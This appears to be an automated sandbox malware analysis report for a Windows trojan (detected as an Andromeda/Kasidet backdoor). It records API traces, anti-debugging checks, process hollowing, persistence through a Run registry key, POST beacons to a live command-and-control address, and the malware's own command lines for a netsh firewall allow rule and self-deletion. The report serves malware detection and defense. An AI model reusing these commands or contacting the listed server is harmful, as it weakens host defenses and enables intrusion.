Summary | ZeroBOX

payload.exe

ScreenShot AntiVM PE32 AntiDebug PE File
Category Machine Started Completed
FILE s1_win7_x6401 July 22, 2023, 9:41 p.m. July 22, 2023, 9:46 p.m.
Size 100.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1dc2580260eb3d20bf700457ce0f235c
SHA256 b9a1bcaaa0067b1e242d7e56024590b579143c170280d136a588f1b60e4fd02a
CRC32 A45247CF
ssdeep 3072:+Tnc3PcvClNcy5jUg8ov5ZsxTFEDk2b97:iogCV5ySkEDk2B7
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
209.145.51.44 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
suspicious_features POST method with no referer header, HTTP version 1.0 used, Connection to IP address suspicious_request POST http://209.145.51.44/tef/tasks.php
request POST http://209.145.51.44/tef/tasks.php
request POST http://209.145.51.44/tef/tasks.php
description abgrcnq.exe tried to sleep 264 seconds, actually delayed analysis time by 264 seconds
file C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
file C:\Users\test22\AppData\Local\Temp\payload.exe
section {u'size_of_data': u'0x00012e00', u'virtual_address': u'0x00008000', u'entropy': 7.773461538477486, u'name': u'.data', u'virtual_size': u'0x000130c4'} entropy 7.77346153848 description A section with a high entropy has been found
entropy 0.758793969849 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: is32bit.exe
process_identifier: 2684
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: inject-x86.exe
process_identifier: 2700
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
cmdline /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline ping 127.0.0.1 -n 3
host 209.145.51.44
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3008
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000110
1 0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\abgrcnq.exe reg_value C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
cmdline netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
wmi SELECT * FROM AntiVirusProduct
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢ž«Ú«¢™«Ú«þÅ«Ú«•Æ«Ú«þÅ«Ú«¢‰«Ú«Ú«¾Ú«y¬µ«9Ú«y¬‡«Ú«RichÚ«PELÅèîWà  ¢òt!À@À@ Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° ˆ@B
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: À.1;1U1e1k1u1z1‡11œ1¢1¬1´1¹1¿1Ê1Ñ1Ú1ù122!2+202W2i2‰23o33ž3©3À3Í3ê3ð34)4`4m4‚4©4¶4½4Î4Ô4è45c5m5t5¢5²5å5ò56<6F6T6|6‚6‘6œ6¡6Ò6ú78H8Œ8´8ˆ;©;Ù;à;û;1<?<U<ƒ<<=Í=×=]>g>€>–>¢>§>.?3?<? |p1z11£1ª1±1¸1¾1Æ1Ì1Ó1Ú1å1ì1ò1ý12 22+20252B2z2ž2®2Î2Ô2Ú233ð3t44›4¡4­4¸4Ü4ã4æ5¦6ö67?8–8ƒ;â;?<x==>P>g>t>”>ž>¸>0ˆ0-0·0151=1E1\1d1j1o1{1‚11“1œ1¢1¨152…2¨2G3w3ƒ3Ã3ð3ø35t5…5Í5ô5ü5&6;6…6œ6ñ67Ó78!8»8á8ì89$9D9O9Ò;Û;< <<<&<-<4<C<\<„<—<=@P®4À4å45$5d5¦5¶566g6‹6¶6¼6Q8º8Ï8:9‚9•9œ9¨9²9·9Å9î9÷9:G:R:^:˜:¡:S;_=2?P@12«2»2Ò2ã2ñ2Š3u4Ï4Û4ç4ñ4$5355#6+6m6u6„6‹6Ÿ6À7Ù7 8,8]88¼8ê8û89.9@9N9V9[9`9k9p9u9€9…9Š9ž9£9¨9):\:Ž:Ÿ:­:³;Ù;õ;-<…==Ç=S>{>‚>º>?“?´?`Ôg0°01!1(1v1}1„1¯1ë4>5”5–6›6¢6¨6Á6ç6î6ô6 777'7/7A7t7{7Š7‘7—7§7­7½7Ç7Í7Ý7ä7é7ò78 88$8,8:8A8O8V8b8~89©9Â9w:þ:<;a;¥;Ö;Ý;<h<<ˆ<Ò<é<ò<:=l=}=—=œ=¸=½=Ý=û=x>‰>•>«>???"?)?0?7?>?E?L?S?Z?a?h?o?v?}?ƒ?ø?ü?pð000 00000 0$0(0,00040:0@0Z00ÿ011H1M1X1^1g1m1 1¥1·144#4*4/4N4h4 5‡5 6À6Ð6í67:7?7ƒ7ý78 8,878L8\8l8|8Š8£8ª8±8À8Ç8ñ8ø899 9+9B9‚9œ9 :<:K:P:i:n:ã:ê:ó:;/;8;D;];n;v;;¸;¿;Æ;å;<<<y<‰<•<Ã<Ê<ß<=È=è=>7>Q>}>Ã>È>Í>Ô>,?q?Ì?€°Y0a0«0²0Ã0Ê0Þ0ì01'1‰1’12Ä2Ë2Ò2Ù2à2ç2î2õ2ü23 3333$4d4y44Ô4 5R5u5ü5}6„6Ô6;7Q7µ7þ748_8¶8»8Ï8æ8î8ü8w9::­:!;(;Y;?<F<{<‚<—<ó<ú<Š=™=©=°=>=>^>ó>?*?2?M?„?Š??Ÿ?²?è?€=0C0W0`0p0}0™0¯0¸0ç0ì0>1~1•1œ1¬1™2«52676I6N6[6l6z6…6 77±8½8ì8:$:Þ:è:ò:ü:;;;J;T;^;h;–;®;´;Ã;Ê;¤<ñ<"={>¼>Ò>Ø>ç>î>î? €:0k0Þ1í1ý12_2Ó2Ù2é2ð2^3 4G4]4ú4!5C5H5]5b5p5w5Œ5¢5å57=7d8ñ899‚9á9ê9ù9:e:Ê:Ñ:{;Ð;ã;<=n=…=Ž=¬=Ç=%><>E>f>ž>£>±>¶>Ê>]?° 0À42826
base_address: 0x0041b000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3008
process_handle: 0x00000110
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢ž«Ú«¢™«Ú«þÅ«Ú«•Æ«Ú«þÅ«Ú«¢‰«Ú«Ú«¾Ú«y¬µ«9Ú«y¬‡«Ú«RichÚ«PELÅèîWà  ¢òt!À@À@ Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° ˆ@B
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0
Process injection Process 2676 called NtSetContextThread to modify thread in remote process 3008
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4202868
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000010c
process_identifier: 3008
1 0 0
file C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe:Zone.Identifier
Process injection Process 2676 resumed a thread in remote process 0
Process injection Process 2676 resumed a thread in remote process 3008
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000
suspend_count: 0
process_identifier: 0
3221225480 0

NtResumeThread

thread_handle: 0xffffffff
suspend_count: 0
process_identifier: 0
3221225477 0

NtResumeThread

thread_handle: 0x0000010c
suspend_count: 1
process_identifier: 3008
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2680
thread_handle: 0x00000110
process_identifier: 2676
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x00000110
process_identifier: 2760
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 1
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2888
thread_handle: 0x000000d8
process_identifier: 2884
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 1
process_handle: 0x000000d0
1 1 0

NtResumeThread

thread_handle: 0x00000000
suspend_count: 0
process_identifier: 0
3221225480 0

NtResumeThread

thread_handle: 0xffffffff
suspend_count: 0
process_identifier: 0
3221225477 0

CreateProcessInternalW

thread_identifier: 3012
thread_handle: 0x0000010c
process_identifier: 3008
current_directory:
filepath: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x00000110
1 1 0

NtGetContextThread

thread_handle: 0x0000010c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3008
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000110
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢ž«Ú«¢™«Ú«þÅ«Ú«•Æ«Ú«þÅ«Ú«¢‰«Ú«Ú«¾Ú«y¬µ«9Ú«y¬‡«Ú«RichÚ«PELÅèîWà  ¢òt!À@À@ Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° ˆ@B
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0040c000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0040e000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: À.1;1U1e1k1u1z1‡11œ1¢1¬1´1¹1¿1Ê1Ñ1Ú1ù122!2+202W2i2‰23o33ž3©3À3Í3ê3ð34)4`4m4‚4©4¶4½4Î4Ô4è45c5m5t5¢5²5å5ò56<6F6T6|6‚6‘6œ6¡6Ò6ú78H8Œ8´8ˆ;©;Ù;à;û;1<?<U<ƒ<<=Í=×=]>g>€>–>¢>§>.?3?<? |p1z11£1ª1±1¸1¾1Æ1Ì1Ó1Ú1å1ì1ò1ý12 22+20252B2z2ž2®2Î2Ô2Ú233ð3t44›4¡4­4¸4Ü4ã4æ5¦6ö67?8–8ƒ;â;?<x==>P>g>t>”>ž>¸>0ˆ0-0·0151=1E1\1d1j1o1{1‚11“1œ1¢1¨152…2¨2G3w3ƒ3Ã3ð3ø35t5…5Í5ô5ü5&6;6…6œ6ñ67Ó78!8»8á8ì89$9D9O9Ò;Û;< <<<&<-<4<C<\<„<—<=@P®4À4å45$5d5¦5¶566g6‹6¶6¼6Q8º8Ï8:9‚9•9œ9¨9²9·9Å9î9÷9:G:R:^:˜:¡:S;_=2?P@12«2»2Ò2ã2ñ2Š3u4Ï4Û4ç4ñ4$5355#6+6m6u6„6‹6Ÿ6À7Ù7 8,8]88¼8ê8û89.9@9N9V9[9`9k9p9u9€9…9Š9ž9£9¨9):\:Ž:Ÿ:­:³;Ù;õ;-<…==Ç=S>{>‚>º>?“?´?`Ôg0°01!1(1v1}1„1¯1ë4>5”5–6›6¢6¨6Á6ç6î6ô6 777'7/7A7t7{7Š7‘7—7§7­7½7Ç7Í7Ý7ä7é7ò78 88$8,8:8A8O8V8b8~89©9Â9w:þ:<;a;¥;Ö;Ý;<h<<ˆ<Ò<é<ò<:=l=}=—=œ=¸=½=Ý=û=x>‰>•>«>???"?)?0?7?>?E?L?S?Z?a?h?o?v?}?ƒ?ø?ü?pð000 00000 0$0(0,00040:0@0Z00ÿ011H1M1X1^1g1m1 1¥1·144#4*4/4N4h4 5‡5 6À6Ð6í67:7?7ƒ7ý78 8,878L8\8l8|8Š8£8ª8±8À8Ç8ñ8ø899 9+9B9‚9œ9 :<:K:P:i:n:ã:ê:ó:;/;8;D;];n;v;;¸;¿;Æ;å;<<<y<‰<•<Ã<Ê<ß<=È=è=>7>Q>}>Ã>È>Í>Ô>,?q?Ì?€°Y0a0«0²0Ã0Ê0Þ0ì01'1‰1’12Ä2Ë2Ò2Ù2à2ç2î2õ2ü23 3333$4d4y44Ô4 5R5u5ü5}6„6Ô6;7Q7µ7þ748_8¶8»8Ï8æ8î8ü8w9::­:!;(;Y;?<F<{<‚<—<ó<ú<Š=™=©=°=>=>^>ó>?*?2?M?„?Š??Ÿ?²?è?€=0C0W0`0p0}0™0¯0¸0ç0ì0>1~1•1œ1¬1™2«52676I6N6[6l6z6…6 77±8½8ì8:$:Þ:è:ò:ü:;;;J;T;^;h;–;®;´;Ã;Ê;¤<ñ<"={>¼>Ò>Ø>ç>î>î? €:0k0Þ1í1ý12_2Ó2Ù2é2ð2^3 4G4]4ú4!5C5H5]5b5p5w5Œ5¢5å57=7d8ñ899‚9á9ê9ù9:e:Ê:Ñ:{;Ð;ã;<=n=…=Ž=¬=Ç=%><>E>f>ž>£>±>¶>Ê>]?° 0À42826
base_address: 0x0041b000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3008
process_handle: 0x00000110
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4202868
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000010c
process_identifier: 3008
1 0 0

NtResumeThread

thread_handle: 0x0000010c
suspend_count: 1
process_identifier: 3008
1 0 0

CreateProcessInternalW

thread_identifier: 2828
thread_handle: 0x00000084
process_identifier: 2824
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 3
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2824
1 0 0

CreateProcessInternalW

thread_identifier: 2948
thread_handle: 0x00000084
process_identifier: 2944
current_directory: C:\Windows\system32\wbem
filepath: C:\Windows\System32\netsh.exe
track: 1
command_line: netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
filepath_r: C:\Windows\system32\netsh.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2944
1 0 0
Bkav W32.Common.65C381EC
Lionic Trojan.Win32.Androm.4!c
MicroWorld-eScan Gen:Variant.Doina.48068
CAT-QuickHeal Trojan.MauvaiseRI.S5242859
McAfee W32/Patcher
Malwarebytes Malware.AI.20242711
Sangfor Suspicious.Win32.Save.ins
K7AntiVirus Trojan ( 0052099b1 )
Alibaba Malware:Win32/km_24a4a.None
K7GW Trojan ( 0052099b1 )
Cybereason malicious.260eb3
Arcabit Trojan.Doina.DBBC4
VirIT Trojan.Win32.Kasidet.BA
Cyren W32/Scar.Z.gen!Eldorado
Symantec SMG.Heur!gen
Elastic malicious (high confidence)
ESET-NOD32 Win32/Kasidet.AR
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Trojan.Gamarue-7104066-1
Kaspersky Backdoor.Win32.Androm.lctq
BitDefender Gen:Variant.Doina.48068
NANO-Antivirus Virus.Win32.Gen.ccmw
SUPERAntiSpyware Backdoor.Andromeda/Variant
Avast Win32:BotX-gen [Trj]
Tencent Malware.Win32.Gencirc.10b31355
TACHYON Backdoor/W32.Androm.102912.E
Emsisoft Gen:Variant.Doina.48068 (B)
F-Secure Trojan.TR/AD.Ambler.bdftd
DrWeb Trojan.Kasidet.26
VIPRE Gen:Variant.Doina.48068
TrendMicro BKDR_ANDROM.SMQ
McAfee-GW-Edition BehavesLike.Win32.Swizzor.cc
Trapmine malicious.high.ml.score
FireEye Generic.mg.1dc2580260eb3d20
Sophos Mal/Generic-S
Ikarus Trojan-Dropper.Win32.Randrew
Jiangmin Backdoor.Androm.lcz
Webroot W32.Trojan.Gen
Avira TR/AD.Ambler.bdftd
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Gridinsoft Trojan.Win32.Dropper.zv!s3
Xcitium TrojWare.Win32.TrojanDropper.Randrew.B@7a247q
Microsoft TrojanDropper:Win32/Randrew.B!bit
ViRobot Trojan.Win32.Agent.102912.AE
ZoneAlarm Backdoor.Win32.Androm.lctq
GData Gen:Variant.Doina.48068
Google Detected
AhnLab-V3 Backdoor/Win32.RL_Androm.R299528
BitDefenderTheta AI:Packer.F5A402241E